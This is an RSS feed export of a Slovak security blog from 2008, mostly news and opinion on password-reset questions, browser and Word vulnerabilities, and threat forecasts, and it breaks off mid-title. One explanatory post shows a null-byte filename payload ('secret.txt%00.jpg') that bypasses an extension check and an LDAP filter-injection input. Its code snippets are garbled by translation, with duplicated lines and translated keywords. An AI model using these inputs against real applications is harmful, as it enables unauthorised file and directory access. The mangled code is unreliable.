<?xml version='1.0' encoding='UTF-8'?><rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:openSearch="http://a9.com/-/spec/opensearchrss/1.0/" xmlns:blogger="http://schemas.google.com/blogger/2008" xmlns:georss="http://www.georss.org/georss" xmlns:gd="http://schemas.google.com/g/2005" xmlns:thr="http://purl.org/syndication/thread/1.0" version="2.0"><channel><atom:id>tag:blogger.com,1999:blog-464579124419695192</atom:id><lastBuildDate>Thu, 29 Aug 2024 03:32:46 +0000</lastBuildDate><category>Security</category><category>News</category><category>XSS</category><category>WiFi</category><category>JavaScript</category><category>Null Bytes</category><title>WebProtected</title><description>Information Security Blog</description><link>http://webprotected.blogspot.com/</link><managingEditor>noreply@blogger.com (Unknown)</managingEditor><generator>Blogger</generator><openSearch:totalResults>25</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><item><guid isPermaLink="false">tag:blogger.com,1999:blog-464579124419695192.post-8567638082577989605</guid><pubDate>Sun, 28 Sep 2008 14:17:00 +0000</pubDate><atom:updated>2008-09-28T19:48:17.503+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Security</category><title>&quot;Zabudli ste heslo?&quot; Hrozia problémy!</title><description>&lt;span style=&quot;font-family:arial;&quot;&gt;Mnohí z nás pravdepodobne už niekedy zabudli svoje prihlasovacie údaje a aby nestratili svoj účet klikli na známy odkaz &quot;Zabudli ste svoje heslo?&quot;, po správnom zadaní mena domáceho miláčika, mena vašej matky za slobodna alebo iných zdanlivo bezpečných kontrolných otázok sa opäť môžete dostať do svojho účtu.&lt;br /&gt;&lt;br /&gt;Ale je tu jeden problém, vaše bezpečnostné otázky v súčasnej dobe môže zodpovedať prakticky hocikto. Niektorí ľudia by boli asi nemylo prekvapený, keby zistili ako málo stačí na zodpovedanie identifikačných otázok pri troche tvorivého hľadania. Bezpečnostné otázky na resetovanie hesla su každým dňom čoraz slabším článkom webu. Niekto si asi povie, že útočník pravdepodobne nebude poznať všetky informácie o mne na toľko, aby mohol zodpovedať kontrolné otázky, ibaže ľudia zabúdajú na fakt, že majú tieto údaje roztrúsené kade-tade a je len otázkou času a šikovnosti útočníka, či sa na druhý deň do svojho účtu dostanete. Pekný príklad môže byť najmä medzi mládežou populárny pokec, na ktorom asi nebude veľmi problém zistiť meno psa, výšku, najlepšieho kamaráta, atď. Takto vlastne obeť podstrčí útočníkovi odpovede rovno pred nos.&lt;br /&gt;&lt;br /&gt;Celý problém je v tom, že poskytovateľom je jedno, v akom bezpečí sú ich užívatelia (česť výnimkám), hlavne že je tam kontrolná otázka a všetci majú pocit bezpečia... až dokým sa niečo nestane. Bezpečnostná otázka by mala byť tažká pre cudzieho a zároveň ľahká pre majiteľa strateného účtu. Napríklad otázky typu &quot;Máte radi divadlo?&quot;. Tieto otázky majú výhodu hlavne v tom, že ich útočník len tažko nájde v nejakej databáze, keďže otázky tohoto typu sa v internetových formuároch takmer nevyskytujú, musí si buď typnúť, poznať obeť na toľko aby ich mohol zodpovedať alebo sa na nich spýtať napríklad cez už spomínaný pokec.  Keby takýchto otázok poskytovateľ dal 10 alebo aj 15, percento odcudzených účtov by sa určite znížilo. Ďalším vylepšovákom by mal byť povinný alternatívny email, na ktorý sa vám zašle novo vygenerované heslo, samozrejmosťou je, že záložný email musí mať tiež aspoň priemerné ochranné prvky (O celkovej bezpečnosti našich portálov a ich prístupu k nej asi ani nemusím hovoriť, povedzme, že útočník neovláda iné techniky, za pomoci ktorých by mohol dostať účet pod svoju kontrolu).&lt;br /&gt;&lt;br /&gt;Ďalším potenciálnym problémom by mohol byť nájsť kompromis medzi bezpečnosťou a pohodlnosťou. Totiž veľa ľudí aj keď má možnosť si nastaviť väčší počet otázok tak to neurobí, nastaví si jednu a pre ňu najľahšiu. Môj názor je, že treba stále nútiť užívateľov k tomu, aby sa zamysleli nad rizikom, ktoré si týmto spôsobujú a že im nebude veľmi príjemné keď si niekto bude čítať jeho poštu alebo sa vydávať za jeho osobu. Samozrejme, že tieto kritériá treba prispôsobiť portálu, aj keď to z hľadiska bezpečnosti nieje optimálne, dal by som minimálny počet indentifikačných otázok aspon na tých 6-7, nech sa užívateľia učia, že to nie je pre ich otravu, ale pre ich vlastnú bezpečnosť a postupom času keď si tieto fakty uvedomia, budú len radi, že  ich poskytovateľ myslí aj na takú vec ako resetovanie hesla.&lt;br /&gt;&lt;br /&gt;Samozrejme tieto vylepšenia sú asi ešte pre väčšinu našich portálov v nedohľadne, nakoľko užívateľia nemajú potrebu mať väčšie súkromie a tým pádom poskytovaťeľia nemajú potrebu s tým nič robiť. O tejto téme by sa dalo asi veľa písať. Ja som to len tak trochu načrtol (dufam, že som na nič podstatné nezabudol :-)&lt;br /&gt;Cya!&lt;br /&gt;&lt;/span&gt;</description><link>http://webprotected.blogspot.com/2008/09/zabudli-ste-heslo-hrozia-problmy.html</link><author>noreply@blogger.com (Unknown)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-464579124419695192.post-2008635434003771953</guid><pubDate>Thu, 25 Sep 2008 09:02:00 +0000</pubDate><atom:updated>2008-09-25T11:50:27.609+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">News</category><title>Bezpečnostné tipy od spoločností Google a AARP</title><description>&lt;span style=&quot;font-family:arial;&quot;&gt;Čoraz viac a viac sa starší Američania prihlasujú na internet, aby mohli zostať v kontakte so svojou rodinou a priateľmy, surfovať po webových stránkach a blogoch, zdielať fotky, prehliadať si videá alebo spustiť internetový biznis. Tak isto ako všetci užívatelia internetu, aj oni môžu naraziť na nebezpečnú činnosť v podobe rôznych vírusov alebo malwarov.&lt;br /&gt;Práve preto spoločnosť Google v spolupráci s AARP zahájily nové video série, ktoré poskytujú ľahko pochopiteľné rady a tipy ako zostať pri práci s internetom v relatívnom bezpečí. Zahrňuje napríklad odkazy na nastavenie súkromia albumov s fotkami, ktoré sa zdielajú online, konfigurácia firewallu pre ochranu svojho počítača, voľba bezpečných hesiel pre svoje online účty alebo vyhnutie sa podvodom typu phising. Ak rozumiete po anglicky, môžete si prehliadnuť videá na &lt;/span&gt;&lt;span style=&quot;font-family:arial;&quot;&gt;serveri &lt;/span&gt;&lt;span style=&quot;font-family:arial;&quot;&gt;YouTube (&lt;a href=&quot;http://www.youtube.com/googleprivacy&quot;&gt;The Google Privacy Channel&lt;/a&gt;) ako aj na stránkach spoločnosti &lt;a href=&quot;http://www.aarp.org/money/consumer/online_safety/&quot;&gt;AARP&lt;/a&gt;.&lt;br /&gt;Tu sa môžete pozrieť na prvé video:&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;center&gt;&lt;a style=&quot;left: 340px ! important; top: 0px ! important;&quot; title=&quot;Click here to block this object with Adblock Plus&quot; class=&quot;abp-objtab-01499562486760263 visible ontop&quot; href=&quot;http://www.youtube.com/v/cdO670FOmFM&amp;amp;color1=0xb1b1b1&amp;amp;color2=0xcfcfcf&amp;amp;fs=1&quot;&gt;&lt;/a&gt;&lt;a style=&quot;left: 340px ! important; top: 0px ! important;&quot; title=&quot;Click here to block this object with Adblock Plus&quot; class=&quot;abp-objtab-01499562486760263 visible ontop&quot; href=&quot;http://www.youtube.com/v/cdO670FOmFM&amp;amp;color1=0xb1b1b1&amp;amp;color2=0xcfcfcf&amp;amp;fs=1&quot;&gt;&lt;/a&gt;&lt;object width=&quot;425&quot; height=&quot;344&quot;&gt;&lt;param name=&quot;movie&quot; value=&quot;http://www.youtube.com/v/cdO670FOmFM&amp;amp;color1=0xb1b1b1&amp;amp;color2=0xcfcfcf&amp;amp;fs=1&quot;&gt;&lt;param name=&quot;allowFullScreen&quot; value=&quot;true&quot;&gt;&lt;embed src=&quot;http://www.youtube.com/v/cdO670FOmFM&amp;amp;color1=0xb1b1b1&amp;amp;color2=0xcfcfcf&amp;amp;fs=1&quot; type=&quot;application/x-shockwave-flash&quot; allowfullscreen=&quot;true&quot; width=&quot;425&quot; height=&quot;344&quot;&gt;&lt;/embed&gt;&lt;/object&gt;&lt;/center&gt;&lt;br /&gt;&lt;span style=&quot;font-family:arial;&quot;&gt;Dúfajme, že sa pomocou rád z týchto videí aspoň trochu zvýší povedomie, aká je v dnešnej dobe bezpečnosť na internete dôležitá&lt;/span&gt;. &lt;span style=&quot;font-family:arial;&quot;&gt;Aj keď môj názor je, že to pravdepodobne neosloví ľudí dostatočne na to, aby celkovo bezpečnosť nebrali na ľahkú váhu.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Zdroje: &lt;a href=&quot;http://googleblog.blogspot.com/2008/09/online-safety-tips-from-google-and-aarp.html&quot;&gt;googleblog&lt;/a&gt; &amp;amp; &lt;a href=&quot;http://www.webpronews.com/topnews/2008/09/24/google-wants-to-protect-old-people&quot;&gt;webpronews&lt;/a&gt;</description><link>http://webprotected.blogspot.com/2008/09/bezpenostn-tipy-od-spolonost-google.html</link><author>noreply@blogger.com (Unknown)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-464579124419695192.post-2835604030689211134</guid><pubDate>Wed, 24 Sep 2008 17:51:00 +0000</pubDate><atom:updated>2008-09-26T17:21:30.379+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">News</category><title>Google za lepší svet</title><description>&lt;div style=&quot;text-align: left;&quot;&gt;Internetový gigant Google najnovšie vytvoril na svoje desiate narodeniny projekt s názvom  &lt;a href=&quot;http://www.project10tothe100.com/index.html&quot;&gt;&quot;Projekt 10&lt;sup&gt;100&lt;/sup&gt;&quot;&lt;/a&gt; . Celý projekt je súťaž, ktorej výherca získa cenu pomocou ktorej pomôže ľuďom z celého sveta. &quot;Hľadáme nápady, ktoré pomôžu  čo najväčšiemu počtu ľudí akýmkoľvek spôsobom, aby sme ich my potom mohli financovať.&quot; vyhlásila spoločnosť Google.&lt;br /&gt;Ak teda máte originálny alebo unikátny nápad, o ktorom si myslíte, že by mohol nejakým spôsobom pomôct ľuďom, môžte tak učiniť &lt;a href=&quot;http://www.project10tothe100.com/submit_your_idea.html&quot;&gt;poslaním&lt;/a&gt; svojej myšlienky. Google potom vyberie 100 najlepsích nápadov, z pomedzi ktorých verejnosť určí 20 projektov, ktoré postúpia do semi-finálového kola, následovne sa oreže počet až na 5 najlepších projektov, ktoré si podľa všetkého rozdelia 10 miliónov dolárov na ich činnosť.&lt;br /&gt;Určite pekná myšlienka od tejto korporácie, uvidíme aký to bude mať vývoj, v každom prípade som rád, že sa nájdu spoločnosti, ktoré chcú investovať do budúcnosti našej zeme. Na záver ešte pekné video k projektu:&lt;br /&gt;&lt;span style=&quot;font-family:arial;&quot;&gt;&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;center&gt;&lt;a style=&quot;left: 0px ! important; top: 15px ! important;&quot; title=&quot;Click here to block this object with Adblock Plus&quot; class=&quot;abp-objtab-032560260371733973 visible ontop&quot; href=&quot;http://www.youtube.com/v/NgSRwOZtDQ8&amp;amp;rel=0&amp;amp;color1=0xb1b1b1&amp;amp;color2=0xcfcfcf&amp;amp;hl=en&amp;amp;fs=1&quot;&gt;&lt;/a&gt;&lt;a style=&quot;left: 0px ! important; top: 15px ! important;&quot; title=&quot;Click here to block this object with Adblock Plus&quot; class=&quot;abp-objtab-032560260371733973 visible ontop&quot; href=&quot;http://www.youtube.com/v/NgSRwOZtDQ8&amp;amp;rel=0&amp;amp;color1=0xb1b1b1&amp;amp;color2=0xcfcfcf&amp;amp;hl=en&amp;amp;fs=1&quot;&gt;&lt;/a&gt;&lt;a style=&quot;left: 0px ! important; top: 15px ! important;&quot; title=&quot;Click here to block this object with Adblock Plus&quot; class=&quot;abp-objtab-032560260371733973 visible ontop&quot; href=&quot;http://www.youtube.com/v/NgSRwOZtDQ8&amp;amp;rel=0&amp;amp;color1=0xb1b1b1&amp;amp;color2=0xcfcfcf&amp;amp;hl=en&amp;amp;fs=1&quot;&gt;&lt;/a&gt;&lt;a style=&quot;left: 340px ! important; top: 0px ! important;&quot; title=&quot;Click here to block this object with Adblock Plus&quot; class=&quot;abp-objtab-05053961771054173 visible ontop&quot; href=&quot;http://www.youtube.com/v/NgSRwOZtDQ8&amp;amp;rel=0&amp;amp;color1=0xb1b1b1&amp;amp;color2=0xcfcfcf&amp;amp;hl=en&amp;amp;fs=1&quot;&gt;&lt;/a&gt;&lt;object width=&quot;425&quot; height=&quot;344&quot;&gt;&lt;param name=&quot;movie&quot; value=&quot;http://www.youtube.com/v/NgSRwOZtDQ8&amp;amp;rel=0&amp;amp;color1=0xb1b1b1&amp;amp;color2=0xcfcfcf&amp;amp;hl=en&amp;amp;fs=1&quot;&gt;&lt;param name=&quot;allowFullScreen&quot; value=&quot;true&quot;&gt;&lt;embed src=&quot;http://www.youtube.com/v/NgSRwOZtDQ8&amp;amp;rel=0&amp;amp;color1=0xb1b1b1&amp;amp;color2=0xcfcfcf&amp;amp;hl=en&amp;amp;fs=1&quot; type=&quot;application/x-shockwave-flash&quot; allowfullscreen=&quot;true&quot; width=&quot;425&quot; height=&quot;344&quot;&gt;&lt;/embed&gt;&lt;/object&gt;&lt;/center&gt;&lt;br /&gt;&lt;br /&gt;Zdroj: &lt;a href=&quot;http://www.webpronews.com/topnews/2008/09/23/google-wants-to-make-the-world-a-better-place&quot;&gt;webpronews.com&lt;/a&gt;</description><link>http://webprotected.blogspot.com/2008/09/google-za-lep-svet.html</link><author>noreply@blogger.com (Unknown)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-464579124419695192.post-5411137885375937614</guid><pubDate>Wed, 30 Jul 2008 15:19:00 +0000</pubDate><atom:updated>2008-07-30T18:09:31.183+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">News</category><title>Radware odhalil kritickú zraniteľnosť v prehliadači Firefox 3</title><description>&lt;span style=&quot;font-family:arial;&quot;&gt;Objav výskumného týmu Radware SOC (Security Operations Center) poukazuje na zraniteľnosť, ktorá by mohla viesť k spadnutiu systému prehliadača Firefox a následovnej strate akýchkoľvek neuložených informácií. Bezprostrednou ochranou pred touto zraniteľnosťou je Radwarov Security Update Service (SUS), ktorý sa snaží chrániť zákazníkov infraštruktúry v predstihu na odhalené závady.&lt;br /&gt;&lt;br /&gt;&quot;Oceňujeme, že Mozilla naďalej výrazne investuje do bezpečnostných vlastností Firefoxu 3, avšak boli sme schopní veľmi ľahko odhaliť túto zraniteľnosť prostredníctvom jednoduchej fuzzing technike.&quot; uviedol Itzik Kotler, riaditeľ SOC, Radware. &quot;Toto jasne ukazuje na to, že tvz. &quot;zero-minute&quot; zraniteľnosti môžu byť stále agresívnejšie voči verejným doménam, takže je čoraz viac zrejmé, že bezpečnostné požiadavky musia zostať na poprednom mieste pri tvorbe a uvoľňovaní nových sieťových aplikácií.&quot;&lt;br /&gt;&lt;br /&gt;Radware takiež určil, že chyba postihuje verziu 3.0 rovnako ako jej menšie aktulizácie (3.0.1)&lt;br /&gt;&lt;br /&gt;Pre viac informácií prosím navštívte domovskú stránku &lt;a href=&quot;http://www.radware.com/&quot;&gt;Radware&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;</description><link>http://webprotected.blogspot.com/2008/07/radware-odhalil-kritick-zranitenos-v.html</link><author>noreply@blogger.com (Unknown)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-464579124419695192.post-2846247223022189075</guid><pubDate>Thu, 10 Jul 2008 12:35:00 +0000</pubDate><atom:updated>2008-07-10T14:36:29.943+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">News</category><title>Microsoft varuje na nové Word útoky</title><description>&lt;p style=&quot;font-family: arial;&quot;&gt;Microsoft vydal dalšie z bezpečnostných prehlásení týkajúce sa útokov zameraných na aplikáciu Word.Spoločnosť v prehlásení uviedla, že obdržala správy útočníkov zameriavajúcich sa na chyby v .doc súboroch. Predpokladá sa, že tieto útoky v súčasnej dobe niesu veľmi rozšírené.&lt;/p&gt;&lt;div style=&quot;font-family: arial;&quot; class=&quot;clanok&quot;&gt;&lt;p&gt;Útočník by mohol použiť špecálne vytvorený dokument, ktorý spôsobý chybu pretečenia pamäte a následný pád aplikácie. Táto chyba by potom zanechala systém zraniteľným a útočníkovi umožňovala vzdialene spustit nebezpečný kód.&lt;/p&gt;&lt;p&gt;Spoločnosť Microsoft tiež uviedla, že zraniteľnosť sa vyskytuje iba v spojení Word 2002 a Sercice Pack 3. Žiadna iná verzia aplikácie MS Word alebo sady Office by nemala byť náchylná k spomínanému útoku. Spoločnosť taktiež doporučuje okrem inštalácie základných bezpečnostných programov ako napríklad brána firewall alebo antivírusový softvér zvýšiť aj ostražitosť pri otváraní mailov s podozrivými .doc súbormi.&lt;/p&gt;&lt;p&gt;Tento týžden je to už podruhé, čo Microsoft vypustill opravný balík pre chybu, ktorá je aktívne využívaná. V pondelok spoločnosť vydala varovanie o vzdialene spúšťajúcom kóde, ktorý sa upriamuje na prvok ActiveX v Office Acces software.&lt;/p&gt;&lt;p&gt;Zdroj: &lt;a href=&quot;http://www.securecomputing.net.au/News/116431,microsoft-warns-of-new-word-attacks.aspx&quot;&gt;securecomputing.net&lt;/a&gt;&lt;/p&gt;&lt;/div&gt;</description><link>http://webprotected.blogspot.com/2008/07/microsoft-varuje-na-nov-word-toky.html</link><author>noreply@blogger.com (Unknown)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-464579124419695192.post-8068198637746819971</guid><pubDate>Tue, 24 Jun 2008 19:19:00 +0000</pubDate><atom:updated>2008-06-25T13:51:50.691+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">News</category><title>Na obzore čoraz viac zákerných útokov</title><description>&lt;span style=&quot;font-family:arial;&quot;&gt;Informačné bezpečnostné fórum (&lt;a href=&quot;https://www.securityforum.org/&quot;&gt;ISF&lt;/a&gt;) začalo varovať pred zvýšeným nárastom škodlivých hrozieb vrátane útokov z organizovanej trestnej činnosti, priemyselnej špionáži spolu s rastom mobilného malwaru a Web 2.0 zraniteľnosťami. Toto sú len niektoré z prognóz v oblasti informačnej bezpečnosti, ktoré sa budú s najväčšou pravdepodobnosťou v priebehu nasledujúcich rokov stupňovať. Správa označovaná ako Threat Horizon 2010, teda vo voľnom preklade niečo ako výstražný horizont vychádza z praktických skúseností a znalostí členov ISF, zahrňujúcich približne 300 najväčších svetových podnikov a organizácií verejného sektoru.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-family:arial;&quot;&gt;Andy Jones, hlavný výskumný poradca pre ISF a autor tohoto komentáru: &quot;Zločinecké skupiny v súčasnej dobe vidia online trestnú činnosť ako málo riskantnú a lukratívnu k okrádaniu bánk. S problematikov ochrany veľkého množstva citlivých informácií držaných organizáciami v elektronickej podobe sú tieto podniky tiež pod neustále rastúcou hrozbou špionáže alebo cielenej strate konkurenčných výhod.&quot;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-family:arial;&quot;&gt;Ďalšou rizikovou oblasťou podľa ISF sú sociálne siete, teda stránky ako napríklad Bebo alebo Facebook, ktoré sa stali obľúbenou a populárnou súčasťou mnohých kancelárií. ISF si totiž myslí, že kybernetický kriminálnici si prispôsobia metódy útokov na zraniteľný cieľ , ktorý v tomto prípade môže byť jedna zo stránok sociálnych sietí.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-family:arial;&quot;&gt;A na záver, ISF správa upozorňuje na riziká v podaní novej techno-generačnej firemnej kultúry poháňanej poväčšine mladšími luďmi. Ohrozený horizont 2010 je jednou z viac než 200 autoritatívnych správ spolu s informačným rizikom a analytických nástrojov, ktoré sú k dispozícií zdarma pre ISF členov.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Viac na &lt;a href=&quot;http://www.net-security.org/secworld.php?id=6255&quot;&gt;net-security&lt;/a&gt;</description><link>http://webprotected.blogspot.com/2008/06/na-obzore-oraz-viac-zkernch-tokov.html</link><author>noreply@blogger.com (Unknown)</author><thr:total>1</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-464579124419695192.post-9182151160762859293</guid><pubDate>Wed, 28 May 2008 18:26:00 +0000</pubDate><atom:updated>2008-05-28T20:27:55.454+02:00</atom:updated><title>Google modernizuje webový softwarový nástroj</title><description>&lt;span style=&quot;font-family: arial;&quot;&gt;Spoločnosť Google plánuje vydať koncom tohoto týždňa takmer finálnu verziu Google Web Toolkit 1.5.GWT 1.5 v aktuálnej podobe obsahuje podporu pre Java 5 a verziu programovacieho jazyka Sun Microsystems vytvoreného v roku 2006.Nový programovací jazyk môže vytvárať software, ktorý beží asi 1,2 až 2 krát rýchlejšie pre komplexné webové aplikácie, povedal Bruce Johnson, technický manažér pre GWT.&lt;br /&gt;&lt;br /&gt;Google sa snaží nasmerovať ľudí na web s nádejou v nepriamy zisk za pomoci vyhľadávania v internete, z ktorého má spoločnosť hlavný príjem.Samozrejme je tu niekoľko menšich priamych výnosov, vrátane poplatkov spoločností za používanie online Google aplikácií, ako je napríklad tabuľkový procesor alebo kalendár.&lt;br /&gt;&lt;br /&gt;App Engine, ktorý bol odhalený v Apríli a súčasne má približne 60,000 schválených užívateľov je zdarma pre štartovacie aplikácie vyžadujúce 500MB priestor a širokopásmovú sieť na podporu asi piatich miliónov zhľiadnutých stránok za mesiac, povedal Google.&lt;br /&gt;&lt;br /&gt;Okrem toho, Google bude účtovať 10 až 12 centov za hodinovú prácu procesoru, plus 15 až 18 centov na gigabyte uloženého priestoru za mesiac, 11 až 13 centov za prenesený gigabyte dát von a 9 až 11 centov za prenesený GB dát dnu.Tieto poplatky sú podobné, ako pri konkurenčnej službe Amazon.&lt;br /&gt;&lt;br /&gt;Google Web Toolkit dovoľuje programátorom písať svoj vlastný kód v Jave, ale potom sa tento kód prevádza do jazyku JavaScript, ktorý je vstavaný vo webových prehliadačoch.Ďalšou prednosťou GWT je, že zvládne manipulovať s JavaScriptom vo viacerých prehliadačoch, tvrdí Google.GWT taktiež podporuje väčšinu moderných prehliadačov, vrátane posledných verzií Internetu Explorer, FireFox, Safari (a iné Webkitové prehliadače, ako napríklad iPhone alebo Google Android) a Opera.Podporovanie týchto nových vlastností robý Google Web Toolkit menej rozdielnym od ostatných Java programovacích prostredí, konštatuje Johnson.&lt;br /&gt;Viac informácií na  &lt;a href=&quot;http://news.cnet.com/8301-10784_3-9953045-7.html?part=rss&amp;amp;subj=news&amp;amp;tag=2547-1_3-0-20&quot;&gt;news.cnet.com&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;</description><link>http://webprotected.blogspot.com/2008/05/google-modernizuje-webov-softwarov.html</link><author>noreply@blogger.com (Unknown)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-464579124419695192.post-4760068846923066869</guid><pubDate>Wed, 14 May 2008 16:59:00 +0000</pubDate><atom:updated>2008-05-18T16:28:52.005+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Null Bytes</category><title>Null Byte útoky</title><description>&lt;span style=&quot;font-family:arial;&quot;&gt;Null byte útoky na webové stránky alebo niektoré dalšie aplikácie niesu ničím novým.&lt;br /&gt;Tu máme Java aplikáciu, ktorá zobrazuje obrázkový súbor určený užívateľom.&lt;/span&gt;&lt;br /&gt;&lt;code class=&quot;something&quot;&gt;String filename = request.getParameter ( &quot;filename&quot;);&lt;br /&gt;&lt;br /&gt;if (filename.endsWith(&quot;.jpg&quot;)) if (filename.endsWith ( &quot;. jpg&quot;))&lt;br /&gt;{ (&lt;br /&gt;File f = new File(filename); Soubor f = new File (filename);&lt;br /&gt;...&lt;br /&gt;&lt;/code&gt;&lt;span style=&quot;font-family:arial;&quot;&gt;Aplikácia sa snaží zaistiť, aby funkciou boli prepustené len JPEG súbory a to kontrolou typu súboru (.jpg).Ak súbor splĺňa tieto požiadavky je odovzdaný konštruktoru &lt;span style=&quot;color: rgb(51, 51, 255);&quot;&gt;java.io.File&lt;/span&gt;, ktorý zadaný súbor otvorí.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family:arial;&quot;&gt;Rozšírená kontrola môže samozrejme prezradiť tento vstupní formulár:&lt;/span&gt;&lt;br /&gt;&lt;code class=&quot;something&quot;&gt;secret.txt% 00.jpg &lt;/code&gt;&lt;br /&gt;kde %oo je URL null byte kódovanie.Funkčnosť útoku sa zakladá na&lt;span style=&quot;font-family:arial;&quot;&gt; odlišných spôsoboch, v ktorých sú prázdne byty zvyčajne spracúvané v rodnom a riadenom kóde.V rodnom kóde je dĺžka reťazca závislá na pozícii prvého prázdneho bytu (null byte) od začiatku tohoto reťazca- nulový byt účinne skončí reťazec.V riadenom kóde objekty reťazca tvoria znakové pole, ktoré môže obsahovať prázdne byty a záznam o dĺžke reťazca.&lt;br /&gt;&lt;br /&gt;Pri vyžšie uvedenom Java kóde &lt;span style=&quot;color: rgb(51, 51, 255);&quot;&gt;String.endsWith ()&lt;/span&gt; po našom vstupe vie, že meno súboru má 15 znakov dlhý reťazec a skontroluje posledné štyri znaky (po null byte) odpovedajú &quot;.jpg&quot;.Avšak keď je meno súboru spracovávané pomocou &lt;span style=&quot;color: rgb(51, 51, 255);&quot;&gt;java.io.File&lt;/span&gt;, táto operácia je napokon implementovaná medzi rodný operačný systém API, v ktorom dĺžka reťazca je určená prvým prázdnym bytom po zahájení príslušného reťazca.Teda názov spracovaného súboru nakoniec vypadá takto:&lt;/span&gt;&lt;br /&gt;&lt;code class=&quot;something&quot;&gt;secret.txt&lt;/code&gt;&lt;br /&gt;&lt;span style=&quot;font-family:arial;&quot;&gt;&lt;span style=&quot;font-family:arial;&quot;&gt;tým pádom je ochrana aplikácie prelomená.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family:arial;&quot;&gt;Zaujímavosťou by mohlo byť, že kód v ASP.NET:&lt;/span&gt;&lt;br /&gt;&lt;code class=&quot;something&quot;&gt;String Filename = Request.Params [ &quot;filename&quot;];&lt;br /&gt;&lt;br /&gt;if (Filename.EndsWith(&quot;.jpg&quot;)) if (Filename.EndsWith ( &quot;. jpg&quot;))&lt;br /&gt;{ (&lt;br /&gt;FileStream fs = File.Open(Filename, FileMode.Open); FileStream fs = File.Open (Filename, FileMode.Open);&lt;br /&gt;...&lt;/code&gt;&lt;br /&gt;&lt;span style=&quot;font-family:arial;&quot;&gt;nieje zraniteľní na ten istý typ útoku.Naše zákerné vstupy by len vyvolali výnimku v podobe:&lt;br /&gt;&lt;code class=&quot;something&quot;&gt;System.ArgumentException:&lt;br /&gt;Znaky niesu povolené!&lt;/code&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;Pred tým, než je náš vstup odovzdaní súborovému systému API, ASP.NET, skontroluje či reťazec obsahuje akékoľvek neplatné znaky vrátane prázdných bytov, ak áno, prístup sa odoprie.Takto sa ASP.NET v tomto prípade snaží chrániť proti null byte útokom.&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;color: rgb(255, 0, 0);font-size:130%;&quot; &gt;&lt;span style=&quot;font-weight: bold;font-family:courier new;&quot; &gt;Null byte útoky proti LDAP&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;LDAP je protokol na pýtanie adresárových služieb a v rámci webových aplikácií sa najčastejšie stretávame s funkciou pre vyhľadávanie personálnych adresárov atď. Predpokladajme, že aplikácia nám umožnuje hľadať podľa názvu zamestnanca iba v marketingovom oddelení.Náš vstup je:&lt;br /&gt;&lt;code class=&quot;something&quot;&gt;Matej&lt;/code&gt;&lt;br /&gt;&lt;span style=&quot;font-family:arial;&quot;&gt;Žiadosť prevádza LDAP otázku s tímto filtrom:&lt;br /&gt;&lt;code class=&quot;something&quot;&gt;(&amp;amp; (displayName = Matej) (= oddelenie marketingu))&lt;/code&gt;&lt;br /&gt;&lt;span style=&quot;font-family:arial;&quot;&gt;V prípade, že LDAP filter kombinuje viacero logických podmienok, ako tu, booleovský operátor na štarte príde o zoznam podmienok a tak sa vzťahuje na všetky podmienky v tomto zozname.Preto nieje priamy logický &quot; or 1=1&quot; útok v SQL Injection.&lt;br /&gt;Na niektorých platformách LDAP je možné dodávať dva filtre back-to-back pričom druhý filter je ignorovaný.V takejto situácii môžeme použiť následujúci zhotovení vstup k obchádzaniu zakázanej alebo obmedzenej sekcii a samozrejme zobraziť všetky položky v adresáry:&lt;br /&gt;&lt;code class=&quot;something&quot;&gt;(&amp;amp; (displayName = *))(&amp;amp;( 1 = 1) (= oddelenie marketingu))&lt;/code&gt;&lt;br /&gt;&lt;span style=&quot;font-family:arial;&quot;&gt;Lenže niektoré služby LDAP, obzvlášť Microsoft&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-family:arial;&quot;&gt; ADAM (Active Directory Application Mode) netolerujú otázky &lt;/span&gt;&lt;/span&gt;s dvoma filtrami.Preto ste mohli počuť, že LDAP injekcie do konjuktívnych filtrov nemôžu byť správne využité proti ADAM adresárom.&lt;br /&gt;&lt;a href=&quot;http://blog.portswigger.net/2008/05/null-byte-attacks-are-alive-and-well.html&quot;&gt;&lt;br /&gt;Zdroj&lt;/a&gt;</description><link>http://webprotected.blogspot.com/2008/05/null-byte-toky.html</link><author>noreply@blogger.com (Unknown)</author><thr:total>3</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-464579124419695192.post-5294380251008350215</guid><pubDate>Tue, 13 May 2008 17:25:00 +0000</pubDate><atom:updated>2008-05-13T21:56:44.040+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">News</category><title>Traja hackeri obvinený zo sniffovania kreditných 